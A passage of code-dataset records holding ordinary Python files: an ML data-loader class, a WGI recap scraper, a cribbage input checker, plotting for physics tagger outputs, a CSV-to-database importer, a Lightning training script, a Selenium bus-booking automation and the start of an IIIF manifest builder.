Make the log file if not already made.\n self.log_file = os.path.join(self.exp_log_dr, 'logs.txt')\n\n else:\n self.exp_log_dr = None\n self.log_file = None\n\n def _print(self, *args, **kwargs):\n '''Overriding the print function to allow for\n customizable verbosity within class methods. Will also\n take care of logging behavior.\n\n Parameters\n ----------\n args\n Anything that would be passed to default python print\n '''\n\n dont_print = kwargs.pop('dont_print', False)\n\n if self.verbose and not dont_print:\n print(*args, **kwargs)\n\n if self.log_file is not None:\n log = open(self.log_file, 'a')\n print(*args, **kwargs, file=log)\n log.close()\n\n def _print_nothing(self, *args, **kwargs):\n pass\n\n # Data loader functionality\n from ._Data import (Set_Default_Load_Params,\n _make_load_params,\n _get_data_file_cnt,\n Load_Name_Map,\n Load_Data,\n Load_Data_Files,\n Load_Targets,\n _proc_target,\n _print_loaded_targets,\n Load_Covars,\n _proc_covar,\n Load_Strat,\n _proc_strat,\n Load_Exclusions,\n Load_Inclusions,\n Drop_Data_Cols,\n _drop_data_cols,\n Filter_Data_Cols,\n Filter_Data_Files_Cols,\n Proc_Data_Unique_Cols,\n _proc_data_unique_cols,\n Drop_Data_Duplicates,\n Binarize_Target,\n _proc_threshold,\n Binarize_Covar,\n Get_Overlapping_Subjects,\n Clear_Name_Map,\n Clear_Data,\n Clear_Covars,\n Clear_Targets,\n Clear_Strat,\n Clear_Exclusions,\n Clear_Inclusions,\n Get_Nan_Subjects,\n _get_targets_key,\n _load_datasets,\n _load_user_passed,\n _load_dataset,\n _common_load,\n _load,\n _set_overlap,\n _merge_existing,\n _proc_df,\n _load_set_of_subjects,\n _process_subject_name,\n _drop_na,\n _filter_by_eventname,\n _show_na_info,\n _drop_excluded,\n _drop_included,\n _filter_excluded,\n _filter_included,\n _get_overlapping_subjects,\n Prepare_All_Data,\n _get_cat_keys,\n _set_data_scopes,\n _get_base_targets_names,\n _get_covar_scopes)\n\n # Update loader docstrings\n Load_Name_Map.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Name_Map)\n Load_Data.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Data)\n Load_Data_Files.__doc__ =\\\n get_new_docstring(Load_Data, Load_Data_Files)\n Load_Targets.__doc__ =\\\n 
get_new_docstring(Set_Default_Load_Params, Load_Targets)\n Load_Covars.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Covars)\n Load_Strat.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Strat)\n Filter_Data_Cols.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Filter_Data_Cols)\n Proc_Data_Unique_Cols.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Proc_Data_Unique_Cols)\n Drop_Data_Duplicates.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Drop_Data_Duplicates)\n\n # Validation / CV funcationality\n from ._Validation import (Define_Validation_Strategy,\n Train_Test_Split,\n _add_strat_u_name,\n _get_info_on)\n\n # Machine Learning functionality\n from ._ML import (Set_Default_ML_Verbosity,\n _ML_print,\n Evaluate,\n Test,\n _premodel_check,\n _preproc_model_pipeline,\n _preproc_problem_spec,\n _get_split_vals,\n _get_subjects_to_use,\n _init_model,\n _handle_scores,\n _print_summary_score,\n _add_to_scores,\n _save_results)\n\n # Fill Evaluate and Test's docstring\n # Evaluate.__doc__ = get_new_docstring(Set_Default_ML_Params, Evaluate)\n # Test.__doc__ = get_new_docstring(Evaluate, Test)\n\n from ._Plotting import (_plot,\n _proc_subjects,\n Show_Data_Dist,\n _input_targets,\n _input_covars,\n _input_strat,\n Show_Targets_Dist,\n Show_Covars_Dist,\n Show_Strat_Dist,\n _get_single_df,\n _show_single_dist,\n _get_cat_display_df,\n _show_dist,\n _display_df,\n _get_top_global,\n Plot_Global_Feat_Importances,\n _plot_multiclass_global_feat_importances,\n _plot_global_feat_importances,\n Plot_Local_Feat_Importances,\n _plot_shap_summary)\n\n from ._Tables import (Save_Table,\n _get_single_dfs,\n _get_table_contents,\n _get_group_titles)\n","sub_path":"ABCD_ML/main/ABCD_ML.py","file_name":"ABCD_ML.py","file_ext":"py","file_size_in_byte":19330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547943538","text":"# The goal of this python script is to create a csv datafile from wgi recap documents\n\n# TODO: Find a way to get information without being so reliant on specific tag identification\n\n\nimport os # For __file__\nimport time # For sleep\nimport requests\nimport re # For regex\nimport pandas as pd\nfrom bs4 import BeautifulSoup # To read html docs\n\ndef parse_recap(link, read_type):\n \"\"\"\n Returns a dataframe containing score information for each ensemble\n \"\"\"\n\n # Conditionally create the soup object from web site or from local file\n x = read_type\n\n if (x == \"LOCAL\"):\n recap_soup = BeautifulSoup(open(link), 'html.parser')\n elif (x == \"WEB\"):\n recap_soup = BeautifulSoup(requests.get(link).text, 'html.parser')\n\n\n # Find div tags with style attributes using regex (this is a very bad way to do this)\n title_smash = []\n for tag in recap_soup.find_all(\"div\", attrs={'style':re.compile(r\".*\")}):\n print(tag.string)\n\n if (tag.string is None):\n title_smash.append(\"\")\n elif (len(tag.string) != 0):\n title_smash.append(tag.string)\n\n event_description = ''.join(title_smash)\n\n # Find each individual table\n recap_soup = recap_soup.find_all(\"table\", style=\"border-bottom: solid 1px #000; margin: 10px auto 0px auto;\")\n\n # Create empty list for all table information\n all_info = []\n\n # Get information for each individual table\n for table in recap_soup:\n\n # Get relevant information from each indivual table\n ensemble_names = [ensemble.text for ensemble in table.find_all(\"td\", \"content topBorder rightBorderDouble\")]\n all_scores = [score.text for 
score in table.find_all(\"td\", \"content score\")]\n judge_names = [judge.text for judge in table.find_all(\"td\", \"content topBorder rightBorder header subcaptionTotal\")]\n captions = [caption.text for caption in table.find_all(\"td\", \"content rightBorder topBorder header captionTotal\")]\n which_class = [score_class.text for score_class in table.find_all(\"td\", style=\"text-align: center; padding: 2px; font-weight: bold; font-size: 14px;\")]\n num_ensembles = len(ensemble_names)\n\n # Handle weird judge tags\n if (len(judge_names) == 0):\n judge_names = [judge.text for judge in table.find_all(\"td\", \"content topBorder rightBorder header subcaptionTotal \")]\n\n\n # First get the ratio of judges - 1 to captions\n ratio = (len(judge_names) - 1) / (len(captions) - 1)\n\n if ratio == 1:\n check = ((len(judge_names) - 1)*2) + (len(captions) - 1) + 3\n elif ratio == 2:\n check = ((len(judge_names) - 1)*3) + (len(captions) - 1) + 4\n\n print(\"Mod check: \" + str(check))\n\n # Pack everything together\n table_information = (ensemble_names, all_scores, judge_names, captions, num_ensembles, which_class, check)\n\n # Append to master list\n all_info.append(table_information)\n\n\n anthonys_greatest_accomplishment = pd.DataFrame()\n\n # Restructure raw score stream\n # Group raw data stream by number of columns in the table (32 is hardcoded) into separate lists\n for table in all_info:\n i = 1\n master_list = []\n sublist = []\n\n check_width = table[6]\n\n # Group scores by table width (check_width)\n for x in table[1]: # Point to score information\n sublist.append(x)\n\n if (i % check_width == 0):\n master_list.append(sublist)\n i = 1\n sublist = []\n else:\n i = i + 1\n\n df = pd.DataFrame(master_list)\n\n df[\"Ensemble\"] = table[0] # Add ensembles to df\n df[\"Class\"] = table[5][0] # table[5] gives returns a list, access its first element\n df[\"Event_Name\"] = event_description\n\n anthonys_greatest_accomplishment = anthonys_greatest_accomplishment.append(df)\n\n return anthonys_greatest_accomplishment\n\n\n# Recap link for 2018\n# https://www.wgi.org/percussion/2018-perc-scores/\n\n# Recap link for 2017\n# https://www.wgi.org/2017-percussion-scores/\n\n# Recap links for MCGC (lots of years)\n# https://www.mcgc.net/scores\n\n# Recap links for California (lots of years)\n# https://sc-pa.org/\n\n\n# Link used to create the intial version of the recap reader\noriginal_link = \"https://recaps.competitionsuite.com/dcdb1a72-f30b-413a-9311-15b8c600138c.htm\"\n\n# Local versions of original_link\nfile_location = os.path.dirname(__file__) + \"/the_holy_file.html\"\nsecond_file_location = os.path.dirname(__file__) + \"/secondary_recap.html\"\n\n# Different recap from WGI's website\ntest_link = \"https://recaps.competitionsuite.com/c06aa0b9-500e-4ab4-9960-fb0e04e103a1.htm\"\n\n# Recap from MCGC (Michigan Circuit)\nmcgc_link = \"https://recaps.competitionsuite.com/904e9141-55b7-45f9-acc8-778fcf83d208.htm\"\n\n# Recap from SCPA (California Circuit)\ncali_link = \"https://recaps.competitionsuite.com/9dbe02e5-8099-4487-b336-ad0969b9607c.htm\"\n\n\n# Point to a web link\n# goodies = parse_recap(cali_link, \"WEB\")\n\n# Point to a local file\n#goodies = parse_recap(file_location, \"LOCAL\")[1]\n\n# Works fine\n#my_df = parse_recap(file_location, \"LOCAL\")\n#print(my_df)\n\n# Works fine\n#test_df = parse_recap(second_file_location, \"LOCAL\")\n#print(test_df)\n\nonline_df = parse_recap(test_link, \"WEB\")\nprint(online_df)\n\n# Write to 
csv\nonline_df.to_csv(\"output_9-24-18.csv\")\n","sub_path":"python/Old Stuff/get_recaps/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150418495","text":"import hand\nimport calculate\n\ndef check_input(deal):\n\n acceptable_values = list(range(2, 11))\n acceptable_values.extend([\"A\", \"J\", \"Q\", \"K\"])\n acceptable_values = [str(val) for val in acceptable_values]\n acceptable_suits = [\"D\", \"C\", \"S\", \"H\"]\n\n clean_deal = deal.replace(\", \", \",\").replace(\" \", \",\").replace(\",,\", \",\")\n print(f'Your entries: {clean_deal.split(\",\")}')\n print(clean_deal)\n clean_deal = [item for item in clean_deal.split(\",\") if item != \"\"]\n print(clean_deal)\n is_valid = True\n\n for item in clean_deal:\n if \"-\" not in item:\n print(f\"Invalid Format: {item}\")\n is_valid = False\n else:\n if item.split(\"-\")[0] not in acceptable_values:\n print(f\"Invalid Format: {item} (Unknown card value)\")\n is_valid = False\n elif item.split(\"-\")[-1] not in acceptable_suits:\n print(f\"Invalid Format: {item} (Unknown suit)\")\n is_valid = False\n\n return is_valid\n\n\ndef main(arglist):\n\n deal = \",\".join(arglist)\n\n if check_input(deal) != True:\n print(\"Exiting\")\n sys.exit()\n\n player_hand = hand.Hand(deal)\n\n calculate.score_hand(player_hand)\n\n\nif __name__ == \"__main__\":\n import sys\n\n main(sys.argv[1:])\n","sub_path":"cribbage-counsel.py","file_name":"cribbage-counsel.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460166339","text":"import unittest\nfrom adder import Adder\n\n\nclass TestBob(unittest.TestCase):\n\n def test_create_adder(self):\n adder = Adder()\n\n def test_increment(self):\n adder = Adder()\n self.assertEqual(adder.increment(3), 4)\n\n \nif __name__=='__main__':\n unittest.main(verbosity=3)\n","sub_path":"app/test_adder.py","file_name":"test_adder.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454497407","text":"\"\"\"\nThis script will rebuild the database from scratch. 
It should run only once during production\nand many times during development.\n\"\"\"\n\nimport logging\nfrom lib.sqlitestore import DataStore\nfrom lib import my_env\n\n\ndef main():\n cfg = my_env.init_env(\"convert_protege\", __file__)\n ds = DataStore(cfg)\n ds.remove_tables()\n ds.create_tables()\n logging.info('End Application')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145909597","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n# histograms\n'''\nfilenames = {\n #\"WW\": \"BGHToWW_gru_Yhat.npy\",\n #\"ZZ\": \"BGHToZZ_gru_Yhat.npy\"\n \"WW\": \"WW_N2.npy\",\n \"ZZ\": \"ZZ_N2.npy\"\n #\"Dense\": \"DensetW.npy\",\n #\"GRU\": \"GRUtW.npy\"\n #\"WW\": \"ww_j_pt.npy\",\n #\"ZZ\": \"zz_j_pt.npy\"\n #\"Jeff\": \"jeff_weights_bkg.npy\",\n #\"DAZSLE\": \"dazsle_weights_bkg.npy\"\n #\"WW\": \"ww_j_pt.npy\",\n #\"ZZ Unweighted\": \"zz_j_pt.npy\",\n #\"ZZ Jeff\": \"zz_j_pt.npy\",\n #\"ZZ DAZSLE\": \"zz_j_pt.npy\"\n}\n'''\n\ninf_dir = \"inference/\"\n\nsamples = [\"BGHToWW\", \"BGHToZZ\"]\nnevts = 1200000\n\n# files to use for N2, GRU, etc\nN2 = {\n \"WW\": \"BGHToWW_ss.npy\",\n \"ZZ\": \"BGHToZZ_ss.npy\",\n \"QCD\": \"QCD_ss.npy\"\n}\n\nY = {\n \"WW\": \"BGHToWW_Y_all.npy\",\n \"ZZ\": \"BGHToZZ_Y_all.npy\"\n}\n\nGRU = {\n \"WW\": \"BGHToWW_gru_Yhat_all.npy\",\n \"ZZ\": \"BGHToZZ_gru_Yhat_all.npy\",\n \"QCD\": \"QCD_gru_Yhat_all.npy\"\n}\n\nDNN = {\n \"WW\": \"BGHToWW_dnn_Yhat_all.npy\",\n \"ZZ\": \"BGHToZZ_dnn_Yhat_all.npy\",\n \"QCD\": \"QCD_dnn_Yhat_all.npy\"\n}\n\nj_pt = {\n \"WW\": \"WW_j_pt.npy\",\n \"ZZ\": \"ZZ_j_pt.npy\",\n \"QCD\": \"QCD_j_pt.npy\"\n}\n\nj_msd = {\n \"WW\": \"WW_j_msd.npy\",\n \"ZZ\": \"ZZ_j_msd.npy\",\n \"QCD\": \"QCD_j_msd.npy\"\n}\n\nweights = {\n \"WW\": np.load(\"dazsle_weights_sig.npy\"),\n \"ZZ\": np.load(\"dazsle_weights_bkg.npy\")\n} \n\n\n\nout = PdfPages(\"out.pdf\")\n\ndef make_arrays(filenames):\n arrays = {}\n basedir = \"\"\n for k, v in filenames.iteritems():\n if 'Y' in v: basedir = inf_dir\n try:\n arrays[k] = np.load(basedir+v)[:, :1]\n except:\n arrays[k] = np.load(basedir+v)\n #print type(arrays[k]), arrays[k]\n\n return arrays\n\ndef make_hist(filenames, weight=False, title=\"\", xlabel=\"\", min_=None, max_=None):\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(title)\n plt.xlabel(xlabel)\n\n arrays = make_arrays(filenames)\n if min_ is None: min_ = min([min(v) for v in arrays.itervalues()])\n if max_ is None: max_ = max([max(v) for v in arrays.itervalues()])\n bins = np.linspace(min_, max_, 100)\n\n for k, v in arrays.iteritems():\n #print k\n #print \"v shape min and max: \", v.shape, '\\n', v.min(), '\\n', v.max()\n if weight:\n w = weights[k]\n #print \"using weights: \", w, len(w)\n n = min(len(w), v.shape[0])\n v = v[:n]\n w = w[:n]\n plt.hist(v, bins=bins, density=True, label=k, histtype='step', weights=w)\n else:\n plt.hist(v[:nevts], bins=bins, density=True, label=k, histtype='step')\n\n \n ''' # plot weighted vs unweighted\n for k, v in arrays.iteritems():\n plt.hist(v, bins=bins, density=True, label='weighted', histtype='step', weights=weights[k])\n plt.hist(v, bins=bins, density=True, label='unweighted', histtype='step')\n '''\n \n plt.legend(loc='upper right')\n \n PdfPages.savefig(out, 
dpi=100)\n return\n\ndef make_hist_from_arrays(arrays, weight=False, title=\"\", xlabel=\"\", min_=None, max_=None):\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(title)\n plt.xlabel(xlabel)\n\n if min_ is None: min_ = min([min(v) for v in arrays.itervalues()])\n if max_ is None: max_ = max([max(v) for v in arrays.itervalues()])\n bins = np.linspace(min_, max_, 100)\n\n for k, v in arrays.iteritems():\n #print k\n #print \"v shape min and max: \", v.shape, '\\n', v.min(), '\\n', v.max()\n if weight:\n w = weights[k][:v.shape[0]]\n #print \"using weights: \", w, len(w)\n plt.hist(v, bins=bins, density=True, label=\"Response > {}\".format(k), histtype='step', weights=w)\n else:\n plt.hist(v, bins=bins, density=True, label=\"Response > {}\".format(k), histtype='step')\n \n plt.legend(loc='upper right')\n \n PdfPages.savefig(out, dpi=100)\n return\n\n# roc curve\nfrom sklearn.metrics import roc_curve\n\nys = [np.load(inf_dir+name+\"_Y_all.npy\") for name in samples]\ny = np.concatenate(ys)\ndnn_yhat = np.concatenate([v for v in make_arrays(DNN).itervalues()])\ngru_yhat = np.concatenate([v for v in make_arrays(GRU).itervalues()])\n\ndef make_roc():\n\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(\"ROC Curve\")\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n\n fpr_dnn, tpr_dnn, _ = roc_curve(y.argmax(axis=1), dnn_yhat[:, :1])\n fpr_gru, tpr_gru, _ = roc_curve(y.argmax(axis=1), gru_yhat[:, :1])\n\n plt.plot([0,1], [0,1], 'k--')\n plt.plot(fpr_dnn, tpr_dnn, label='DNN')\n plt.plot(fpr_gru, tpr_gru, label='GRU')\n\n plt.legend(loc='best')\n PdfPages.savefig(out, dpi=100)\n \n return\n\ndef make_msd_arrays(yhats, k, min_=0, max_=.8, n=5):\n try:\n yhat = yhats[k][:,0]\n except:\n yhat = yhats[k]\n msd = make_arrays(j_msd)[k]\n msds = {}\n for i in np.linspace(min_, max_, n):\n mask = np.where(yhat > i)[0]\n msds[i] = msd[mask]\n return msds\n\n#make_hist(N2, weight=True, title=\"N2\", xlabel=\"N2\")\n#make_hist(DNN, weight=True, title=\"DNN\", xlabel=\"Response\")\n#make_hist(GRU, weight=True, title=\"GRU\", xlabel=\"Response\")\n#make_roc()\n\ndef make_report():\n make_hist(j_pt, weight=False, title=\"j_pt (unweighted)\", xlabel=\"j_pt\")\n make_hist(j_pt, weight=True, title=\"j_pt (weighted)\", xlabel=\"j_pt\")\n make_hist(j_msd, weight=False, title=\"j_msd (unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist(j_msd, weight=True, title=\"j_msd (weighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n WW_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"WW\")\n WW_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"WW\")\n ZZ_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"ZZ\")\n ZZ_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"ZZ\")\n\n make_hist_from_arrays(WW_DNN_j_msds, weight=False, title=\"WW j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(WW_GRU_j_msds, weight=False, title=\"WW j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(ZZ_DNN_j_msds, weight=False, title=\"ZZ j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(ZZ_GRU_j_msds, weight=False, title=\"ZZ j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n\ndef make_QCD_report():\n make_hist(j_pt, weight=False, title=\"j_pt (unweighted)\", xlabel=\"j_pt\")\n make_hist(j_msd, weight=False, title=\"j_msd (unweighted)\", xlabel=\"j_msd\", min_=0, 
max_=200)\n\n QCD_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"QCD\", min_=0.4, max_=0.8, n=5)\n QCD_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"QCD\", min_=0.4, max_=0.8, n=5)\n\n make_hist_from_arrays(QCD_DNN_j_msds, weight=False, title=\"QCD j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(QCD_GRU_j_msds, weight=False, title=\"QCD j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n \n#make_report()\nmake_QCD_report()\n\nout.close()\n\n\n\n\n\n\n\n'''\ndazsle_weights = np.load(basedir+\"dazsle_weights_ordered.npy\")\ni = len(dazsle_weights) - len(arrays[\"ZZ Unweighted\"])\n\nweights = {\n \"WW\": np.ones(len(arrays[\"WW\"])),\n \"ZZ Unweighted\": np.ones(len(arrays[\"ZZ Unweighted\"])),\n \"ZZ Jeff\": np.load(basedir+\"jeff_weights_bkg.npy\"),\n \"ZZ DAZSLE\": dazsle_weights[i:]\n}'''\n","sub_path":"train/dazsle-tagger/mass_sculpt_plots.py","file_name":"mass_sculpt_plots.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193903942","text":"import zipfile\nimport glob\nimport os.path\n\ndef zipdir(fn, d = \".\"):\n (upper_dir, base_dir) = os.path.split(d)\n os.chdir(upper_dir) \n files = glob.glob(base_dir+\"/*\") \n zippable_files = []\n for f in files:\n if (os.path.isfile(f)): \n zippable_files.append(f) \n zf = zipfile.ZipFile(fn, \"w\", zipfile.ZIP_DEFLATED)\n for fn_to_archive in zippable_files:\n zf.write(fn_to_archive)\n zf.close()\n","sub_path":"Exercises/Archives_Homework/src/zipdir.py","file_name":"zipdir.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546141199","text":"\n'''Import books.csv into books table.'''\nimport csv\nimport os\nfrom sqlalchemy import create_engine, text\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n# Set up database connection\nengine = create_engine(os.getenv(\"DATABASE_URL\"), \n connect_args={\"application_name\":\"application.py\"}, \n echo=True)\ndb = scoped_session(sessionmaker(bind=engine))\n\n\ndef main():\n with open(\"books.csv\", \"r\") as books:\n reader = csv.DictReader(books, fieldnames=['isbn', 'title', 'author', 'year'])\n # Skip header\n next(reader)\n # Insert CSV data into table\n statement = text(\"INSERT INTO books(isbn, title, author, year) VALUES(:isbn, :title, :author, :year)\")\n for row in reader:\n row['year'] = int(row['year'])\n db.execute(statement, row)\n db.commit()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24771513","text":"import pytorch_lightning as pl\nfrom pytorch_lightning import callbacks\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\n\nfrom utils.load_cfg import load_cfg\nfrom utils.prepare_seed import prepare_seed\n\nimport click\n\nfrom agents import *\n\nfrom loaders import *\n\n@click.command()\n@click.option('--config', '-cfg', required=True)\ndef cli(config):\n cfg = load_cfg(config)\n prepare_seed(cfg.exp_cfg.seed)\n agent = eval(cfg.agent)(cfg.agent_cfg)\n loaders = eval(cfg.data_loader.name)(**cfg.data_loader.kwargs)\n checkpoint_callback = ModelCheckpoint(\n dirpath=cfg.checkpoint_dir,\n **cfg.model_checkpoint\n )\n 
logger = TensorBoardLogger(\n name=cfg.exp_name,\n **cfg.logger\n )\n\n trainer = pl.Trainer(\n callbacks=[checkpoint_callback],\n default_root_dir=cfg.out_dir,\n logger=logger,\n **cfg.trainer\n )\n\n trainer.fit(\n model=agent,\n train_dataloader=loaders.train_loader,\n val_dataloaders=loaders.test_loader\n )\n\nif __name__ == '__main__':\n # cli(['-cfg', 'configs/iwslt15_transformer.yaml'])\n # cli(['-cfg', 'configs/fashion_mnist_mlp.yaml'])\n cli()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165677772","text":"from queue import Empty\nfrom selenium import webdriver\nfrom datetime import date\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport pyttsx3\nfrom Identify_query import Recognize_voice\n\n\ndef bus_auto(x_var):\n engine = pyttsx3.init()\n import time\n driver = webdriver.Chrome(\"C:\\Final Year Project\\Chrome Driver\\chromedriver.exe\")\n driver.maximize_window()\n url = \"https://www.redbus.in/\"\n driver.get(url)\n time.sleep(1)\n # retrieve data from user data file\n driver.find_element_by_id('src').send_keys(x_var[0])\n time.sleep(3)\n driver.find_element_by_id('dest').send_keys(x_var[1])\n time.sleep(3)\n driver.find_element_by_id('onward_cal').send_keys('0')\n\n def month_to_number(string):\n m = {\n 'jan': 1,\n 'feb': 2,\n 'mar': 3,\n 'apr': 4,\n 'may': 5,\n 'jun': 6,\n 'jul': 7,\n 'aug': 8,\n 'sep': 9,\n 'oct': 10,\n 'nov': 11,\n 'dec': 12\n }\n s = string.strip()[:3].lower()\n\n try:\n out = m[s]\n return out\n except:\n raise ValueError('Not a month')\n\n x = date.today()\n u_mm = x_var[4]\n mm = x.strftime(\"%B\")\n _u_mm = month_to_number(u_mm)\n _mm = month_to_number(mm)\n dd = x_var[3]\n flag = _u_mm - _mm\n r_dd = x_var[7]\n r_mm = x_var[8]\n r_yyyy = x_var[9]\n\n while flag > 0:\n try:\n d = driver.find_element_by_xpath(\n \"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td[@class='next']\").click()\n flag -= 1\n except:\n raise Empty(\"Please provide valid month\")\n\n driver.find_element_by_xpath(\"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td[text()=\" + dd + \"]\").click()\n driver.find_element_by_xpath(\"//button[@id='search_btn']\").click()\n time.sleep(10)\n p = driver.find_element_by_xpath(\"//div[text()='View Buses']\")\n if p:\n p.click()\n else:\n p = 0\n\n content = driver.page_source\n soup = BeautifulSoup(content, \"html.parser\")\n info = soup.find_all('div', attrs={'class': 'clearfix row-one'})\n print(len(info))\n name_ = []\n tpe_ = []\n price_ = []\n time_ = []\n for a in info:\n name = a.find('div', attrs={'class': 'travels lh-24 f-bold d-color'})\n name_.append(name.text)\n tpe = a.find('div', attrs={'class': 'bus-type f-12 m-top-16 l-color'})\n tpe_.append(tpe.text)\n price = a.find('div', attrs={'class': 'seat-fare'})\n price_with_text = price.text\n price_without_text = res = [int(i) for i in price_with_text.split() if i.isdigit()]\n price_.append(price_without_text[0])\n time = a.find('div', attrs={'class': 'dp-time f-19 d-color f-bold'})\n time_.append(time.text)\n\n df = pd.DataFrame({'Travels Name': name_, 'Bus Type': tpe_, 'Price': price_, 'Time': time_})\n df.to_csv('products.csv', index=False, encoding='utf-8')\n\n driver.close()\n\n csv_data = pd.read_csv('products.csv')\n all_ele = []\n for row in csv_data.index:\n all_ele.append(csv_data['Price'][row])\n\n all_ele_len = len(all_ele)\n average_price = sum(all_ele) / all_ele_len\n print(average_price)\n\n 
engine.say(\"Now tell me, Which type of Bus you like to book?\")\n engine.say(\"We have some types, and these are: R T C means Government buses, Shivshahi buses, Shivneri buses, \"\n \"Private buses, or you can book sleeper bus \")\n engine.runAndWait()\n b_type = Recognize_voice()\n engine.say(\"at what time you like to book\")\n engine.runAndWait()\n booking_time = Recognize_voice()\n bad_stm = ['at', 'on', 'in']\n for i in bad_stm:\n booking_time = booking_time.replace(i, '')\n\n # making data frame from csv file\n data = pd.read_csv(\"products.csv\", delimiter=',')\n\n # replacing blank spaces with '_'\n data.columns = [column.replace(\" \", \"_\") for column in data.columns]\n\n def closest(lst, K):\n return lst[min(range(len(lst)), key=lambda i: abs(lst[i] - K))]\n\n # time filter\n\n # find actual price from average price\n K = average_price\n actual_price_close_to_avg_price = closest(all_ele, K)\n print(actual_price_close_to_avg_price)\n\n if 'shivshahi bus' in b_type or 'shivshahi buses' in b_type or 'shivshahi' in b_type:\n # filtering with query method for Shivshahi buses\n # data.query('Bus_Type == \"SHIVSHAHI\"', inplace=True)\n\n ele_having_shivshahi = data[data.Bus_Type == 'SHIVSHAHI']\n minValue = ele_having_shivshahi['Price'].min()\n time_of_that_bus = ele_having_shivshahi.loc[ele_having_shivshahi['Price'] == minValue, 'Time'].iloc[0]\n print(ele_having_shivshahi)\n print(minValue)\n print(time_of_that_bus)\n engine.say(\"I found one bus for you at lowest price, at \" + str(minValue))\n engine.say(\"and Bus time is \" + str(time_of_that_bus))\n engine.runAndWait()\n bus_name_at_user_time = ele_having_shivshahi.loc[ele_having_shivshahi['Time'] == booking_time, 'Travels_Name'].iloc[0]\n print(bus_name_at_user_time)\n","sub_path":"bus_automate.py","file_name":"bus_automate.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498468183","text":"# -*- coding: utf-8 -*-\nfrom subprocess import check_output\nimport glob\nimport sys\nimport os \nfrom IIIFpres import iiifpapi3\nfrom itertools import cycle\n#folder = sys.argv[1]\nfolder = r\"/Users/univr/Pictures/41\"\nromconv = {1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V',\n 6: 'VI',\n 7: 'VII',\n 8: 'VIII',\n 9: 'IX',\n 10: 'X',\n 11: 'XI',\n 12: 'XII',\n 13: 'XIII',\n 14: 'XIV',\n 15: 'XV',\n 16: 'XVI',\n 17: 'XVII',\n 18: 'XVIII',\n 19: 'XIX'}\n\ntsv_datasetpath = r\"list.tsv\"\nsegnatura = 41\ndef search(segnatura):\n with open(tsv_datasetpath,'r') as f:\n header = True \n for i in f:\n records = i.split(\"\\t\")\n if header:\n h = records\n header = False\n elif records[5] == str(segnatura):\n return dict(zip(h,records))\nrecord = search(segnatura)\nsegnatura = str(segnatura)\niiifpapi3.BASE_URL = \"http://lezioni.meneghetti.univr.it\" \nmanifest = iiifpapi3.Manifest()\nmanifest.set_id(extendbase_url=[\"manifests\" ,segnatura])\nsegn = \"%s (%s)\" 